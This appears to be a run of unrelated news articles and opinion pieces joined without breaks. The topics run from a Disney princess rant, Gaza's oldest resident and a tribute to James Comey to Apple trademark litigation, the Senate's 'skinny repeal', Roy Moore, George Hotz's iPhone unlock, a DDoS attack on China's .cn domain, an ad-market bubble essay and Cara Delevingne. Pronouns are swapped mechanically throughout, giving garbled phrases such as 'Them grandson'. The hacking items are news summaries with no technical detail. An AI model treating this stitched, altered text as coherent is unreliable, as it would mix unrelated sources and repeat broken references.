So what lessons have we learned from Disney's Princess experiment? That any guy no matter what their misgivings is worth chasing after as long as they look good and has money. Love according to Jersey Shore so to speak. The animated abomination that was the Hunchback of Notre Dame made that clear…ugly deformed people need not seek love from beautiful people. Rather, accept that the good lookers seek each other and you will never have true love.
Well, that is unless you've got access to the great equalizer…cold hard cash. According to Disney the Hunchback would be sporting a harem if that was the case!
So thank you Disney. Thank you for at least ending this social experiment that has created more expendable Kim Kardashians and self-absorbed couch potatoes that we care to admit. Yes, we still must drown in plastic princess toys for a time until the warehouses run dry, but maybe there is hope down the line.
Maybe tomorrow's little girls can aim higher than being superficial, vacuous, sugar-daddy hunters.
Gaza's oldest resident, Um Saleh Hamood passed away and was buried on Monday in a grave which was dug out for them more than 20 years ago.
The 128 year old was born in 1886, according to their family, and had five sons and four daughters.
Them grandson Mohammed Hamood, 30, told the Anadolu Agency that Um Saleh's father was a soldier in the Ottoman Army.
They added: “Hamood's father joined the Turkish Ottoman army, and spent more than 35 years in it.”
Until their death, Um Saleh kept earrings which were more than 100 years old, made of pure Turkish gold, which their father had brought over and gifted them at their wedding.
A number of Turkish organisations working in the Gaza Strip had approached Um Saleh to purchase their earrings, which are considered ancient, to exhibit them in an “archaeological” museum in Turkey.
They also kept a flour mills which, their grandson explains, the family used to grind wheat kernels and coffee.
“My great grandfather brought this mill from Turkey, 95 years ago, during one of their visits to see the family in Palestine, their breaks from the army,” Mohammed explained.
They said that their grandmother continued to use the mill in recent periods.
Mohammed said their grandmother had completed the pilgrimage (hajj) four times in their life, saying they worked for more than 30 years as a midwife.
Below is the transcript of an interview conducted by the Lebanese broadcaster Al-Mayadeen TV Um Saleh Hamood.
News anchor: One of the weirdest stories to come out of Gaza is that of a house that has stood in the Strip for over 100 years. In it lives Um Saleh Hamood who is over 115 years old, as they say.
Reporter: Between these walls a number of residents live, we entered this historic house in Jabalia, Gaza. In it lies an elderly lady, 115 years old. They live in this house with their son Saleh who is in their 80s. They remember everything about their life as if it was a fast playing movie.
In a jolly manner they sing national songs that they have sung for tens of years. They stay on this bed, unable to move, in spite of the fact that they suffer from no illnesses.
They have held on to a few relics from the old days including the flour mill.
They lived through part of the Ottoman rule of Palestine, and saw the British take control of Mandate Palestine and their departure, then the Israeli occupation that ensued.  They are the greatest witness of the history of Palestine.
Saleh: During the Ottoman Empire they were illiterate, and then when the British came they began to read. The life they lived was simple. Not materialistic.
Reporter: Over 10 years ago, Um Saleh got very ill; their family thought they were dying, so they dug up their grave in preparation. Everyone who helped dig the grave has now passed away, while they live on to play with their great, great grandchildren.
History is preserved through the lives of those that have experienced it. Palestine and its story are embodied in the likes of Um Saleh who maintain the memories in spite of their old age.
[In the video below, Um Saleh's words are incomprehensible]
The former FBI director is a giant of a man with an even bigger heart.
James Comey is sworn in as FBI Director in 2013. (Photo11: Evan Vucci, AP)
“I wonder what their story is,” FBI Director James Comey said to no one in particular as our motorcade rolled through Lower Manhattan, past an elderly woman on a bench embracing a swaddled child.
“Everyone has a story and I bet their story is incredible.”
This was not an unusual musing from our now departed leader — a giant of a man with an even bigger heart, whose focus was always on trying to understand and improve the lives of others.
This particular visit centered on a meeting in New York with counterterrorism officials. Afterward, rather than head back to the airport, Comey asked to be taken to the local FBI office so they could visit “the troops.” As the head of a deployed organization with offices nationwide, they would utilize any visit outside Washington to connect with our people. They walked the building floor by floor, meeting colleagues at their desks, extending their hand and offering a simple thank you for their service.
To say their firing jarred much of the FBI family would understate the varying levels of sadness, anger and confusion that followed the sudden dismissal of a man held in such high regard throughout American law enforcement. With the election and its aftermath consuming the national psyche, it may be hard to see past current headlines to reflect upon the incredible impact they had on our organization — but their legacy is a story worth telling.
How does one describe the impact someone like Comey had on the FBI? You start by doing something they would have shunned: highlighting their success. Like their predecessor, who faced and tackled challenges unique to their era, Comey took on growing problems within the organization in key areas such as leadership, agility and diversity. It might seem strange to call a respected leader a maniac, but Comey was nothing short of maniacal in driving change throughout the organization in order to right an off-axis leadership selection process, make the FBI more agile, and correct a major diversity problem.
Comey's servant leadership principles were contagious and spread like wildfire throughout our organization. They purposefully populated our senior ranks with leaders who were kind but tough, confident yet humble. They cultivated a cadre of team-oriented field commanders who were not threatened by the notion that their subordinates might know more than they did.
Realizing they themselves could never stop improving, they fought to ensure they would not get trapped in a bubble devoid of varying perspectives, or become comfortable with the trappings of power. They got their own lunch, placed their own calls, and had zero patience for ego or arrogance. Any of our 36,000 employees could email them directly and they would respond. Their servant leadership style was reflected in those who surrounded him: senior staff who shared their passion for the rule of law; junior staff like myself who never once felt hesitant to speak up to challenge them with a differing point of view; and, as would prove their most important picks, an accomplished deputy director and senior executives who are now successfully navigating us through transformational waters.
Concerned the bureau was not as agile as it could be in adjusting to address emerging threats, Comey worked tirelessly to ensure that new ideas and inventive ways of doing business were not only accepted, but embraced. As they would passionately admonish new recruits during regular visits to the FBI Academy: “Do not let the grumpy old people crush your spirits! I'm a grumpy old person, and I can't see us as freshly as you do. Study us and make us better.”
Comey looked at the organization and realized we soon risked a proverbial fall down the stairs. Our agent population had become increasingly white and change was needed. As they would say, not only is focusing on diversity the right thing to do, it is also an issue of effectiveness. If we do not accurately reflect the communities we serve, we risk being less effective. They assembled a machine of personnel and resources dedicated to attracting diverse talent. Indeed, their personal commitment to diversity was illustrated in the reason we flew 2,000 miles to Los Angeles on the day they were fired — so they could attend a diversity recruitment event and personally pitch talented young people on joining the FBI.
POLICING THE USA: A look at race, justice, media
When asked how they wanted to be remembered, Comey would quip that they wanted to be forgotten. They imagined finally getting us to a place where the solutions to our leadership, agility and diversity challenges were so ingrained in our culture, we would no longer remember even having a problem. Those of us shaped by them will tirelessly work to ensure their goals are achieved — although they will not soon be forgotten.
It's strange writing about Comey in the past tense, because it feels like writing an obituary. In a way I am doing just that, because despite curious observations from outsiders regarding Comey's standing among our FBI family, we are very much an organization in mourning. Fortunately for the FBI, their legacy of leadership and service will permeate our great institution for generations to come as the countless young leaders they touched rise in the organization. Although we must eventually move on and accept recent events — the security of the American people demands our focus on mission — many of us will never stop celebrating the legacy of our seventh director. Like the woman on the bench we passed that day in Manhattan, Director Comey has a story, and it's incredible.
Joshua Campbell is a special agent with the FBI who served as special assistant to former FBI director James Comey. The opinions expressed here are their own and do not represent those of the Federal Bureau of Investigation.
You can read diverse opinions from our Board of Contributors and other writers on the Opinion front page, on Twitter @USATOpinion and in our daily Opinion newsletter. To submit a letter, comment or column, check our submission guidelines.
Read or Share this story: https://usat.ly/2sW9uiy
CHATTANOOGA, Tenn. (WDEF) — One political group we don't hear as much about, but is gaining a following, is the Libertarian Party.
And the group here in Hamilton County is growing.
- Advertisement -
New member David DuBose tells News 12 they were a longtime Republican, but they are voting Third Party this election.
They say more folks like themselves are becoming Libertarians, because both the GOP and Democratic party are moving away from America's core values.
DuBose says voting Third Party is not a wasted vote, or a vote against Hillary or Trump.
“In a practical sense of things, we don't really expect to win the whole presidential election,” DuBose said. “That would be a big surprise. But what we hope to do is establish that the Libertarian Party is a viable alternative for voters, and use this as a base to build on. What we really want to do is build awareness at both the state, local and national levels.”
DuBose says polls show Libertarian presidential candidate Gary Johnson's supporters are made up of both Democrats and Republicans.
Chinese clothing brand says Apple ripped off its own trademark for App Store logo
A Beijing court has accepted the case
Shanghaiist.com Blocked Unblock Follow Dec 27, 2017
Despite all of its kowtowing to Chinese authorities of late, Apple now finds itself facing yet another copyright lawsuit in China.
A Chinese clothing company is claiming that the Silicon Valley tech giant ripped off its own trademark in creating its new Apple App Store logo. Both logos feature the letter “A” spelled out in stick design fashion and do look very similar — of course there's only so many ways you can design an “A.”
Apple introduced the new logo earlier this year, replacing an old one of similar design, but which used a pencil, ruler, and brush instead of the stick shapes.
KON, a Beijing-based clothing label which launched in 2009, registered its trademark in 2012. The company targets young consumers and says that its logo design was inspired by none other than Johnny Rotten of The Sex Pistols, China's official Xinhua news agency reports.
Arguing that customers are unable to tell the two logos apart, KON is suing Apple, demanding 100,000 yuan in compensation, along with an injunction against infringing devices, such as iPhones and iPads, as well as a public apology.
A court in Beijing has accepted the lawsuit.
Apple is no stranger to the Chinese courtroom. Last year, the company was hit with a number of rather frivolous lawsuits, including one that granted a Chinese company the right to brand its leather products with the label “IPHONE.”
Faced with slipping sales in the Chinese market and hampered by government interference, Apple appears to now be doing all that it can to get on Chinese regulators' good side. This year, the company has removed VPN apps, Skype, and The New York Times from its China app store in response to pressure from Chinese authorities.
Earlier this month, Apple CEO Tim Cook attended China's “World Internet Conference” in Wuzhen and said that their company shared the conference's vision of “developing a digital economy for openness and shared benefits.”
Senate Republicans are planning to include a provision in their "skinny repeal" healthcare bill that would cut off federal funding from Planned Parenthood for a year, according to a GOP aide.
The bill, which is a watered-down version of changes Republicans have been trying to make to Obamacare, also would eliminate the invidual mandate requiring people to buy health insurance, one of the least popular provisions of the law, but one that the Congressional Budget Office estimates could result in rougly 16 million more people becoming uninsured in 2018. The employer mandate that obligates companies to provide coverage if they have 50 or more employees would be withdrawn for six years, and Congress would have the option to renew it.
The medical device tax, a portion of Obamacare that members of both parties have said they would consider repealing or suspending, would be suspended for six years, when it can be delayed again or put back in place.
Asked why it was not repealed, a Senate GOP aide replied, "couldn't pay for it." Community health center funding would be increased after stripping family planing funds from Planned Parenthood. The funding pays for birth control, STD testing and cancer screenings, but would for a year be cut off from facilities that also provide abortions. Under a provision called the Hyde Amendment, federal funds are prohibited from going toward most abortions.
In a statement, Planned Parenthood blasted the move.
"After weeks of posturing, it turns out that Senate Republican leadership's so-called ‘skinny repeal' is really just a plan to block millions of patients from accessing cancer screenings and birth control at Planned Parenthood," Dawn Laguens, executive vice president of Planned Parenthood Federation of America, said in a statement.
Having failed to arrive at a consensus after months of closed-door negotiations, Senate Republicans have turned their attention to what they are calling the " skinny repeal" option after failing to pass two other pieces of legislation on Obamacare this week. One of the bills would have repealed Obamacare and delayed implementation of a new plan for two years, while the other would have immediately replaced the law with other provisions and made long-term changes to the Medicaid program. Both pieces of legislation failed to gain enough support, even among Republicans.
Republicans are advancing the legislation through reconciliation, which means they can pass a bill with only 50 votes, but have to abide by strict rules and craft legislation that affects only the federal budget, and must meet certain targets in reducing the deficit. They can afford to lose no more than two votes for their healthcare bill.
The Senate can pass the bill and send it to conference, where both chambers of Congress would hash out additional details before sending it to President Trump, or the Senate can send it to the House, which could pass it to send to the president.
"We are operating on the assumption the House will pass the skinny as is tomorrow," a Senate GOP aide said.
But Sen. John Cornyn, R-Texas, a member of GOP leadership, tweeted Thursday morning that a skinny bill would not be sent to the president and that it would be a vehicle for conference.
Sen. Lindsey Graham, R-S.C., told reporters that if the bill passes the bill had no chance of passing the House, and House Freedom Caucus Chairman Mark Meadows, R-N.C., has said the same. Graham and other senators are demanding a guarantee that the bill would go to conference if it is passed in their chamber. They have said that trimming around the edges of Obamacare would not be enough to guarantee their support.
"If you passed it as a standalone proposition it would destroy the insurance markets and we would own the failure of Obamacare," Graham said, referring to how the plan would destabilize the exchanges next year. Still, they said it may allow for the addition of a provision they have been working on with Sen. Bill Cassidy, R-La., which would shift Obamacare funding to states to craft their own plans.
The Graham-Cassidy provision has not been evaluated by the Senate parliamentarian to see whether it abides by Senate rules, and Graham said they were meeting with them later Thursday.
"It will determine whether or not I will vote for the skinny bill ... the skinny bill is getting bigger," they said.
* Susan Ferrechio and Robert King contributed to this report.
Eversource has signed a $25 million agreement with the town of New Canaan for a three-year project that will expand its gas distribution system.
The New Canaan project will initially involve the installation of 4.7 miles of underground pipeline along a proposed route that includes State Route 106 and South Avenue (Route 124) to connect natural gas to New Canaan's downtown business district, New Canaan High School, Saxe Middle School, South Elementary School, Waveny Care Center and the New Canaan YMCA. Eversource stated that it would begin a series of neighborhood forums later this summer to provide details on the project and information on the natural gas conversion process.
“A lot of hard work and conversations took place to make this happen and I am delighted that natural gas expansion is here,” said Town of New Canaan First Selectman Rob Mallozzi. “It is a tremendous opportunity for our community and one that will benefit us for many years to come.”
roy moore
Former Alabama Chief Justice and U.S. Senate candidate Roy Moore votes at the Gallant Volunteer Fire Department, during the Alabama Senate race, Tuesday, Sept. 26, 2017, in Gallant, Ala. (AP Photo/Brynn Anderson)
Even before last week's allegations against Republican Senate candidate Roy Moore dropped I had dozens of friends and acquaintances who had confided in me their hesitance in voting for the twice-removed judge.
But since that bomb dropped? Oh buddy, have those conversations picked up.
Over the last several days I've heard from hundreds of people on why they can no longer support Moore, and several who say they absolutely still do. Among all of these people I began to see a pattern develop: those who are standing behind Moore tend to be the above the age of 40, and those for whom Moore is an unacceptable candidate tend to be younger than 40.
So I put a call out on social media. The conversation picked up even more, and that dividing line became even clearer.
A common refrain I heard was that the allegations of sexual assault were simply the final nail in the coffin. They believed they were unfit for office before, and that grandstanding isn't a substitute for real policy accomplishments. Before the allegations most said they were willing to hold their nose and vote for Moore to keep a pro-life candidate in that office, but weren't happy about feeling required to cast their ballot for someone they don't feel represents their other stances.
David Wisdom and Marco Rubio
Madison Smith, a college student, said they are a two-time survivor of sexual abuse who didn't feel comfortable with Moore before. "Then these accusations came out and it just affirmed my thought that they don't need to be anywhere near the justice system."
There are very vocal young republicans like David Wisdom and Michael Bullington, who record a weekly podcast about Alabama Politics called Young Alabama.
Wisdom, whose grandfather Elbert Peters is a prominent and longtime Republican figure, proudly displays a Trump sticker in the background of the featured image of this week's episode and says, "No one here wants to endorse Doug Jones. They stand for everything I'm against. I just want us to stop and think about what we are doing in supporting Roy Moore, especially considering what has transpired over the past few days."
Michael Bullington
"I wasn't going to vote for Moore before all this came out because of their lack of policy understanding (or at the least policy communication) and their dismal history in office," Bullington told me Tuesday. "But I definitely won't vote for them now. The line has to be drawn somewhere, and he's long since passed it. People need to put principle over politics because without principle there's no value in the politics."
(For more of their commentary, check out the hour-long episode on the topic they released this week)
Here's a sampling of what some other young Republicans have told me, on the record:
Collier Tynes
"I am a lifelong conservative who simply wants the Republican Party to live out our values. Even if Roy Moore receives more votes than Doug Jones, it will not be a win for our party. It will be another signal to the world that we put politics over human decency. If defending victims of childhood molestation has become controversial, we have hit rock bottom. To what end are we not willing to hold our people accountable for their actions? If you are a victim of domestic violence or sexual assault, there is hope and help in Alabama. By calling 1-800-650-6522, you can reach the nearest domestic violence center. You will be believed, you will be heard, and you can begin healing, no matter how many years it has been. (emphasis mine) " - Collier Tynes, former chief of staff for First Lady Dianne Bentley and current chief of staff at a child and family agency
"Before this whole sex scandal even erupted, Moore was unacceptable to me because as a so-called constitutional conservative there are parts of the constitution that they seem not to respect, like the supremacy clause and the equal protection clause... In addition to the problems I have with Roy Moore because of their policy positions, we now have these allegations that came out about sexual misconduct... As somebody who lives in a state that's supposed to be super conservative and believes in the founding principles of this country, we're left again without a morally-acceptable candidate who truly believes those things. It's incredibly frustrating." - Jordan LaPorta, law student.
Austin Harrington
"I am a millennial conservative and I can not and will not be voting for Roy Moore. Moore's brand of fire and brimstone politics misrepresents not only Alabama, but conservatives and Christians. Their comments and actions in the past and their handling of recent allegations have proven the toxicity of this closed-minded and immature school of conservative thought. They do not represent the honor and compassion of Conservatives or Christians." - Austin Harrington, college student.
"I'm 35 and I vote for the candidate, not the letter beside their name, but as someone who doesn't have children yet but just moved back to Birmingham from Atlanta in April, I do not want that man representing our state and my home in Washington. They do not represent us, they are going to be a punching bag nationally for our state and they would be the absolute worst representative for Alabama in Washington. You wouldn't want your children to play little league football or baseball with them as a coach, you wouldn't want to do business with this man, why would you put them in the Senate?" - Matthew Morris, works in marketing and advertising.
Brett Walton
"I am a 23 year old Christian, conservative, white male who grew up in a small town in Alabama. During my time at Auburn (one of the most conservative schools in the nation), I served as the Chairman of the Auburn University College Republicans. I voted for President Trump. So I am not a Democrat, Independent or even what some would call a Moderate Republican. However, I cannot support Roy Moore. The allegations against them are sickening, and the sources appear to be credible. I was willing to look past Judge Moore making Alabama look foolish by riding around on their horse brandishing their gun like a wannabe cowboy, but enough is enough. I may fundamentally disagree with Doug Jones on many issues, but they at least seems to be a respectable man who won't continue to further embarrass the state of Alabama. It is time that we as Republicans and Alabamians demand better out of our leaders, but the only way that will happen is we get out and vote with our guts, our minds, and our consciences. I sincerely hope that my fellow Alabamians will not stand by any longer and let Roy Moore continue to degrade what it means to be a Christian, a conservative, and a Republican." - Brett Walton, an accountant.
Of course all of this is anecdotal, and there certainly were voices on the other side of the dividing line.
One in particular, third generation Republican Ann Bennett, says they believe Moore, and sees the allegations as fabrications.
Ann Bennett
"I believe Roy Moore's denials because I believe they are a man of integrity. I don't know them personally, but I know people who do, and they say they are a man of integrity. When you don't know someone and are having to judge their character, we are told to know them by their fruit. They twice gave up one of the most powerful positions in Alabama for their principles, and suffered financial consequences for doing that. It would have been so easy to just agree with what the media urged them to do and keep their job and power. I don't know many people who will do that who have been elected to political office, and that looks like good fruit to me."
The only young Republican who was willing to go on the record with me in support of Moore had this to say:
Dylan Smith and Roy Moore
"The Democrats can't run on their radical liberal agenda of big government, open borders, and unrestricted abortion. I firmly support Judge Moore because they will fight for the values of hardworking, God-fearing Alabamians. I want the debt reduced, taxes cut, Obamacare repealed, and our liberty protected. Judge Moore is a constitutional conservative who has shown throughout a lifetime of service that they are willing to stand up and fight for principle." - Dylan Smith, works in banking.
Whether or not Roy Moore wins this Senate race, one thing is becoming increasingly clear: the Republican party is heading toward a reckoning. The question they should consider when discussing if they will continue supporting Moore is whether or not it is worth the long-term ramifications putting down their names as in support of an accused child molester.
Kids these days aren't supporting Roy Moore. Where will that leave the Republican party when these "kids" start running for office?
A teen hacker known for their deftness with iPhones has figured out how to unlock models running the latest firmware versions by cracking a protection that has frustrated hackers for weeks.
The breakthrough by George Hotz, aka Geohot, means people who have bought a recent iPhone will once again be able to use it on the phone network of their choice. Apple makes as much as $400 for every handset that's activated on an approved network, so its developers have worked hard to prevent the so-called unlocking of iPhones.
Last year, 17-year-old Geohot was among the first group of hackers to break Apple's iron-fisted grasp on the iPhone, a coup that won them a Nissan 350Z and 3 8GB iPhones. Apple promptly responded by issuing updated firmware that stymied such efforts. Not only did the updates disable modified phones, effectively turning them into $400 bricks, they also prevented unlocking software from working in many cases. The arms race has persisted ever since.
The latest salvo was fired late last week, following a 24-hour hacking spree by Geohot that was broken up by only three hours of sleep. It turns out the latest firmware contained modifications to the device's memory registers to prevent unlocking. Geohot worked around those changes by finding another, much higher register that was vulnerable.
"I guess Apple thought big numbers were harder to guess," they wrote.
They then found a way to install their custom-built code by exploiting a flaw that allowed them to erase a range of memory addresses where security software is stored.
"The technique was not one that I was familiar with at all," said Kevin Finisterre, a researcher who has spent a fair amount of time dissecting Apple devices. "From the read it sounds as though the gentleman has made some significant progress. More importantly they are sharing."
This latest unlocking is no small accomplishment because iPhones are programmed to accept only approved SIM cards. Geohot's technique appears to work around this limitation by writing to certain sections of the firmware.
The hack is highly technical and by no means for the faint of heart. Those iPhone owners in need of more hand-holding should check out step-by-step instructions here from iClarified. ModMyiPhone also offers a tutorial here.
Several weeks ago, analysts at Bernstein Research estimated that 1 million iPhones, or a full 27 per cent of the handsets sold to date, are running on unauthorized networks. At that rate, Apple could lose $1bn in revenue over the next two years. Rest assured that developer drones in Cupertino are already laboring to circumvent this latest workaround. ®
Early Sunday morning, China experienced what it is now calling its “largest ever” DDoS attack. According to The China Internet Network Information Center (CNNIC), the country's .cn servers went down as a result of the attack, with affects lasting hours for some users.
According to the Wall Street Journal, the attack occurred in two waves — first around 2 a.m. local time, and then a larger attack launched at 4 a.m. — and focused on websites with the .cn extension. While the true depth of the damage is uncertain. CloudFlare CEO Matthew Prince told the WSJ that the company saw a precipitous drop in traffic from the country, dipping 32 percent below its normal traffic for that hour.
Advertisement
The country has seen a major increase in DDoS attacks — tripling year-over year according to Akamai's State of the Internet from Q4 2012. China a complex internet structure with many filters to ensure that the government has complete control over content, the infamous Great Firewall of China, its citizens see, but it still doesn't have the faculties to outmatch old-fashioned server overload.
But, perhaps more importantly, authorities have yet to really explain what happened or who was involved. The attack has come during the sensational trial of Chinese official Bo Xilai, but motives behind the attack, if known, are unlikely to be publicly revealed. And, while there is healthy speculation that the attack could have been launched by a single individual with a well-constructed botnet, the CNNIC has remained tight-lipped on the matter. The government has instead chosen to focus on remedies, explaining in the press release that more services will be coming to reduce the network's vulnerabilities and strengthen their .cn servers.
On The Bubble
<a href="http://www.flickr.com/photos/mwichary/2831542077/">Marcin Wichary</a> via Flickr Okay, a few more thoughts on this Chris Dixon article and whether it's a bubble, since going and reading the article, I am surprised to see Dixon arguing that not only is it a safer bubble (private investors, discussed in my last entry) but that perhaps it's not a bubble at all.
That, to me, seems incorrect. It's a bubble. Absolutely no doubt. Some thoughts on their arguments for it not being a bubble:
First, Dixon points out that bubbles are the decoupling of valuations and underlying economic fundamentals. This is true, definitely, but bear in mind it is the decoupling of individual companies, or assets valuations and the individual company's economic fundamentals, not the economy's as a whole. A strong or growing economy doesn't make this less true. It's on an asset by asset basis. Dixon correctly points out that it's hard to pin the value of the current crop of assets, so they can't say whether or not they're overvalued. However, this lack of ability is actually a characteristic of a growing bubble. I don't know Facebook's economic fundamentals (aside from rabidly reading the rumors) but I would still love a piece of it. That should be of concern.
The argument that bubbles can't happen so long as the economy is growing, because there's always someone left to hold the bag, is incorrect. Bubbles, almost by definition, decouple from the rest of the economy, and you can very much have a bubble burst when the rest of the economy is doing just fine. In fact, this is more or less what happened in the first dot com bust, though like many bubbles, it got so big it effected the rest of the economy. This is an important distinction. This last housing bubble was inextricably tied to the economic meltdown that occurred in the banking sector. The two were linked, so it's easy to say all bubbles are that way, but it's totally not true. The 91/92 real estate bubble bursting (mainly in the south) was not tied to the larger economy. The Japanese asset price bubble in the late 80's. The 97 financial crisis. In fact, by and large, bubbles happen in improving economies.
Okay, second point, where perhaps my trade and job might shine a unique perspective. Dixon says:
"The forces that drive the internet economy are strong and will probably only get stronger. I argue this regarding online advertising here so won't repeat it. Since I wrote that post we've also seen a number of tech companies emerge that are generating significant revenues through non-advertising means - "freemium" (e.g Dropbox), paid mobile apps, virtual goods (e.g. Zynga), transaction fees (AirBnB), etc."
I'll leave the freemium/non-advertising revenues off the table since I'm no expert, but I get the strong sense they are still ancillary. The online advertising economy growing issue, however, I believe, is a red herring. And one I know a bit about.
Brands don't actually want or need any more media channels. As far as they're concerned, the internet can stop now. We have enough channels. We were happy when we had like seven (TV, print, outdoor, radio, in-store, direct and theater), got a little interested in the first few new ones. Urinals? Uh, okay. Banners? Interesting. Google? Yes. Groupon, Farmville, GroupMe? OKAY I AM GETTING TIRED NOW. Silicon Valley seems to think that advertising's appetite for new media channels is unending. It is not. Marketers are changing. They are not the daft old man who doesn't understand the new thing but knows they need it and spends money on it. It's a woman and they are getting smarter. Even they know there's a point where they're reached their customers enough.
And yes, every time I talk to a Valley person about this they go on about how marketers want more data and they'll pay for it, and they want to know everything about a person and oh man do you know how much advertisers would pay for this data? Well, yes, I do. But I guarantee you, YOU DO NOT KNOW. They have fixed budgets. I could tell you EXACTLY how much they will spend, because I spend that money. It is not bottomless. The endless quest for advertisers to know everything about their customers may never end, but its budgets will not increase forever. We will pick the best 3-10 data sources and stick with them. And in the meantime, the VCs will have effectively funded a massive R&D effort to radically improve those sources (THANK YOU) but in the end, we'll still be paying about the same amount a year for the same 3-10 (say 100 if you're P&G or WPP).
Then there's the media money. The money agencies spend on placing ads. Though the valley can't usually articulate it, this is the other big batch of money they're going for, because it's what Google and Yahoo! did. They got big brands to spend some of their giant media money on them instead of yellow pages or newspaper ads. You look at Google, and you think to yourself "oh man you can make a giant business out of advertising!" This line of thinking is usually accompanied by a chart showing the migration of advertising money from traditional channels to online channels, and they say "look how much more there is! It's moving over at the rate of $6 Billion a year!"
Okay, stop. No it's not. This is going to level out eventually. Do I have a chart to prove it? No. But it's just common sense. Advertisers are going to stop advertising on Glee? Mad Men? American Idol? Viewership erosion has ebbed, TV has stepped up to the new competition and started making awesome shit. The first, easy places for innovation - yellow pages, classifieds - are levelling out, and while brand advertising spend is growing online still, it will never get all of it, since, well, the net still sucks for brand advertising* compared to TV and Outdoor. Pew Internet will track the changes now between web and tv in media consumption habits over years and decades - nothing will move fast enough to have an impact on this bubble.
Next, the olds. And that's the other chart these people usually trot out - some chart showing how many old people are on the internet now. No they're not. And they're not going to be any more than they are right now any time soon. Look at the rate they're increasing their use of the internet. It's not increasing. It's holding steady, yes, but there's no big shift in the immediate horizon.
Plus, even if there was, the olds cost less to advertise to. Ads on Glee cost about $272,000 for 26 million viewers. Penny a viewer. Those ads on 60 minutes cost $92,000 for 14 million viewers. two thirds of a cent per viewer. Daily show? $28,000 for 3 million viewers or so. .93 cents per viewer. And that's cable. Advertisers spend less on advertising to the olds on a per viewer, per show basis.
Do you know how much those Facebook ads targeted to you cost vs those targeted to the olds? EXACTLY THE SAME. At first you think, "hey great, when they advertise on the web instead of TV, we'll make more!" But no, it doesn't work that way. First, it is a massive disincentive to migrate that advertising spend to the web, and secondly, it means we already got the good part of the spend. There is no reason to think that advertisers won't just keep spending on the olds on TV until they die, then advertise on the web to the next set of olds who will be on the internet. But either way, nothing's gonna happen to it in any big way in any time frame that's going to impact this bubble.
I've mentioned this before, but I believe strongly that as money migrates from traditional to digital it will decline. Part of it is due to what I outlined above. Part of it is because of the perceived lack of inventory limitation. And part of it is because we told marketers for years we were cheaper.
It gets worse. IF (big if) Silicon Valley ever actually delivers on the snake oil dreams of perfect information and perfect targeting that they promise the ad world (and, by the way, for the record, I doubt I'm alone in advertising when I say I don't want it, and I don't need it, but that is totally a different article), why would I need to buy a bunch of ads on the 1,000 or so new ad-funded startups to reach my audience? The very efficacy of the products the Valley is building will utterly disrupt the economics they are purporting to claim will sustain them. Will it work for the better for the Valley or the worse? Just because it worked for the better for Google does not mean it has to happen that way again.
You know what? Fuck it. Hey Silicon Valley. You can have EVERY SINGLE PENNY the US spends on advertising. $200 billion. Forgive me, I'm mixing figures here, but it will still be broadly be true. You know what? TAKE THE WHOLE WORLD. Hey internet, take every penny spent on advertising in the whole, wide world. $450 billion. You already have just over $100 billion of it. You only get 350% more growth. At all. Ever. Google's revenue? Let's call it $36 billion. YOU ONLY GET NINE MORE GOOGLES. Worldwide. If you get it all. And you will not, ever, get it all. Yes, the world economy will grow, yadda yadda, and ad spend will increase as the world economy grows, but not at the rate to make one bit of impact on this bubble, and not at any rate comparable to putting your money in a savings account.
If every penny of advertising in the world came to Silicon Valley, out of these thousands of new startups, there would be only nine Googles. Worldwide. In China. In Europe. It sounds like a lot, but how many companies are out there being funded on this premise?
One last way to look at the baked in absurdity: say everything I'm saying is too negative and every year, like clockwork, SIX BILLION DOLLARS of advertising spending arrives in the internet economy. I think that figure is off by an order of magnitude, but so what. Six billion bucks. That's it. How many companies can that fund? How many are going to get their piece of that pie? We are fighting over a pie that is roughly the size of the cupcake industry.
I will leave you with a final thought, that's really best for another post. Despite the Valley's obsession with advertising, they still massively misunderstand it. They think it can be solved with algorithms, and not people. They also thought this about lawyers at one point. LegalZoom is doing great I hear, but so are lawyers. Not every penny of advertising will ever go to computers.
Okay, okay, I am done. But to recap:
1) A solid economy does not mean a bubble can't happen
2) Marketers aren't going to pay much more than they do now for all this awesome new customer data
3) TV ad money will not turn into internet ad money at the same revenues
4) The worldwide ad spend is not enough to fund a hundredth of the companies that are being funded to pursue it.
Happy weekend!
* this was an edit - it used to say "brand marketing" but I meant "brand advertising," as Noah pointed out. Thank you.
This post originally appeared at Rick Webb's blog.
Model and actor Cara Delevingne has spoken out on “totally sexist” superhero movies, ahead of their role in DC's Suicide Squad.
Captain Marvel: women writers hired for first female-fronted superhero movie The women behind Guardians of the Galaxy and Inside Out have been hired to pen script for forthcoming comic-book adaptation about female pilot with ‘energy projection' superpowers Read more
Delevingne, who also stars in this summer's teen romance Paper Towns, took the opportunity to criticise the portrayal of women in comic book films, during an interview with Empire (via Yahoo ).
“There are only three girls in [Suicide Squad] but in my opinion they have the best roles,” they said. “Generally though, superhero movies are totally sexist.
“Female superheroes are normally naked or in bikinis. No one would be able to fight like that. Wonder Woman, how the hell do they fight? They would be dead in a minute.”
Gal Gadot as Wonder Woman, who will star in next year's Batman V Superman: Dawn of Justice. Photograph: PR
The comments could cause tension at DC, given that Wonder Woman will be a stablemate of Delevingne's character Enchantress in next year's Suicide Squad. It's already been leaked that Ben Affleck's Batman will be crossing over from Zack Snyder's Batman v Superman: Dawn of Justice to David Ayer's film but no word on whether Wonder Woman will make an appearance. They will be getting their own movie however, set to be released in 2017.
Delevingne will star alongside Will Smith, Margot Robbie and Jared Leto in Suicide Squad, which hits cinemas on 5 August 2016.
Rep. Greg Walden, R-Hood River, addresses the opening day of the Republican National Convention in Cleveland in July. Walden is chairperson of the House Enegy and Commerce Committee, one of two committees that released reforms Monday to the Affordable Care Act. (The Associated Press file photo) 6045062
Rep. Greg Walden, R-Hood River, addresses the opening day of the Republican National Convention in Cleveland in July. Walden is chairperson of the House Enegy and Commerce Committee, one of two committees that released reforms Monday to the Affordable Care Act. (The Associated Press file photo) - Bulletin
A- A+
By Tara Bannow The Bulletin
Residents of Oregon's second congressional district, including a Bend city councilor, aired their concerns to U.S. Rep. Greg Walden about health care, public lands and immigration in a telephone town hall meeting Monday.
More than 4,000 people in Southern, Central and Eastern Oregon — location was a requirement for participating — listened in on the call with Walden, a Republican calling for a repeal of the Affordable Care Act.
Walden has proposed legislation that would maintain the Affordable Care Act's coverage guarantee for people with pre-existing conditions. Their measure, however, does not include mention of whether insurers could charge more for that coverage. They also said Monday they support the existing law's ban on lifetime coverage limits and the provision that lets kids stay on their parents' policies until they're 26.
Of the 10 people whose questions they fielded, half asked about health care.
